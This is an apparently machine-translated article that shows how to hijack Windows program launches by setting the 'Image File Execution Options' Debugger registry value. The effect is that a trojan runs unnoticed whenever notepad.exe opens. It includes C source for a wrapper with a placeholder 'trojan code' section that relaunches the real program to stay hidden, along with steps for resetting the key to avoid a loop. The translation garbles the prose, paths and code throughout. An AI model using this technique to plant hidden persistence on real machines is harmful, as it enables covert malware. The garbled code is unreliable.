Research on an alternative File Association Method

Text/figure Peng Yi
The file association method was implemented earlier by the "glacier" program. For self-protection purposes, "glacier" associates TXT files with EXE files. ). The specific implementation is to modify the REG_EXPAND_SZ type value of the registry key "HKEY_CLASSES_ROOTxtfileshellopencommand. The default value is "% SystemRoot % system32NOTEPAD. EXE % 1". "% 1" indicates the text file name to be opened. This association method of the "glacier" program has affected many Trojan and Backdoor programs. Of course, it has become the focus of anti-virus software. Is there another way to associate programs?
Solomon and Russinovich: the internal secrets of Windows 2000 deeply explores the design and implementation of all aspects of the system. In the "CreateProcess process" section, Russinovich pointed out that when a program creates a process through CreateProcess, the first step is to open the image to be executed (For details, refer to the relevant chapters of this book ). Specifically, CreateProcess finds the appropriate Win32 image, such as Win32, Win16, MS-DOS, POSIX, or OS/2, then, a suitable loader is selected to load the Win32 image. After a valid Win32 executable image is found, CreateProcess searches for the Debugger value in the Registry HKLMSoftwareMicrosoftWindows NTCurrentVersionImage File Execution Options exist table item. If the value is not empty, run the serial number (such as backdoor.exe) of the value and start from phase 1. Here, Phase 1 is what we see above: CreateProcess will re-open the image to be executed, which is very important and will be seen later.
Russinovich also mentioned in the book that "if you occasionally want a prank, you can use this behavior to confuse people and run another file when they want to run the specified file ". If you do not want to engage in prank, but program Association, this location is also an ideal breeding ground for Backdoor trojans. Let's take a look at this registry entry, as shown in 1. We can see that there are many items in this registry entry. So many items will inevitably Let us explore and replace the programs we need. You may have used Russinovich's Process Explorer (www.sysinternals.com). One menu item in the program is "Replace Task Manager", that is, replacing the Windows system's built-in Process view program Task Manager (taskmgr.exe ). How is this done? One of the tricks to steal a column is to modify this registry entry, which is what Russinovich calls the "prank" program, as shown in 2.

Figure 1

Figure 2
Note that the value of the Debugger table item in Figure 2 has been replaced with PROCEXP. EXE, the executable program of Process Explorer. Now everyone knows that we only need to add a replacement File name under the Image File Execution optionsregistration table. In this case, we add notepad.exe, add a Debugger value of the REG_SZ type to it, and add the path of the Trojan program to it, for example, "c: rojan.exe", everything is fine. Below we will write a test program to see the implementation effect, the Code is as follows.
 
# Include <windows. h>
# Include <stdio. h>
# Include <tchar. h>
// # Define Debug
Int _ tmain (int argc, LPTSTR argv [])
{
LPTSTRszCmdLine [200] = {0 };
// Prepare for CreateProcess Parameters
STARTUPINFO si;
PROCESS_INFORMATION pi;
ZeroMemory (& si, sizeof (si ));
Si. cb = sizeof (si );
ZeroMemory (& pi, sizeof (pi ));

// Place your trojan code here ...:)
MessageBox (NULL, _ T ("You are hacked! "), _ T (" Warning "), 0 );
// Trojan code end

_ Tcscat (szCmdLine, argv [1]);
_ Tcscat (sz1_line, _ T (""));
_ Tcscat (szCmdLine, argv [2]);

# Ifdef Debug
_ Tprintf (_ T ("% s"), szCmdLine );
Getch ();
# Endif

// Start the child process.
If (! CreateProcess (NULL, // No module name (use command line)
SzCmdLine, // Command line
NULL, // Process handle not inheritable
NULL, // Thread handle not inheritable
FALSE, // Set handle inheritance to FALSE
0, // No creation flags
// CREATE_NO_WINDOWS, // No Windows !!!
// CREATE_NEW_PROCESS_GROUP,
NULL, // Use parents environment block
NULL, // Use parents starting directory
& Si, // Pointer to STARTUPINFO structure
& Pi) // Pointer to PROCESS_INFORMATION structure
)
{
_ Tprintf (_ T ("CreateProcess failed (% d)", GetLastError ()));
Return 2;
}

# Ifdef Debug
// Wait until child process exits.
WaitForSingleObject (pi. hProcess, INFINITE );
# Endif
// Close process and thread handles.
CloseHandle (pi. hProcess );
CloseHandle (pi. hThread );
Return 0;
}
// End

The program is very simple. First run our backdoor program. Here we run a dialog box with the code "MessageBox (NULL, _ T (" You are hacked! "), _ T (" Warning "), 0);"; next, after the operation is complete, we need to complete the default steps of the program. Similar to this example, the program uses notepad.exe foo.txt to open a text file named foo.txt. So we need to get this parameter and execute it normally, so that our program can be executed without knowing it and achieve the goal of stealth.
The Program for getting the correlated parameters is as follows:
 
_ Tcscat (szCmdLine, argv [1]);
_ Tcscat (sz1_line, _ T (""));
_ Tcscat (szCmdLine, argv [2]);
 
You may ask, what are argv [1] and argv [2? . Because the program is a simple test, the number of input parameters is not checked. If the test program does not run the association operation independently, it will crash (there may be no input parameters.
Okay. After obtaining the parameter, start calling CreateProcess for execution and the program is completed. Let's test, as shown in result 3.

The expected dialog box appears. Click "OK" and the dialog box appears again. This is the important part at the beginning of this article. After CreateProcess runs the associated program in Stage 1, it will return to Stage 1 again, that is, open the image to be executed, so that it will execute our dialog box cyclically, the program is not executed. Therefore, I tried to use WinExec or ShellExecute instead of CreateProcess. Next, try to discard the parameter selection method similar to _ tcscat (szCmdLine, argv [1]) and adopt hard encoding, that is, directly calling "c: windowsotepad.exe" or failure. Later, try to clear the associated Debugger key values before calling CreateProcess. After running CreateProcess correctly passes the parameters and runs them, associate the Debugger key values. Facts have proved that this method is feasible. The specific code is to read and write the registry twice. For details, see the Code provided below.
The test program in this article does not solve the problem of space in the text file path. Specifically, if your text file is on the desktop, such as "c: Documents and Settingsuser Desktop \ foo.txt ". In the program, this parameter is truncated to "c: Documents". Let's take a look at this issue.
In general, this file association method is easy to ignore, and there may be some uncertain factors in the implementation process. But as a hidden file association method, anti-virus software should be included in the scope of detection and removal. This article is only used for pure technical communication. Any behavior that uses this technology for illegal use is irrelevant to this article.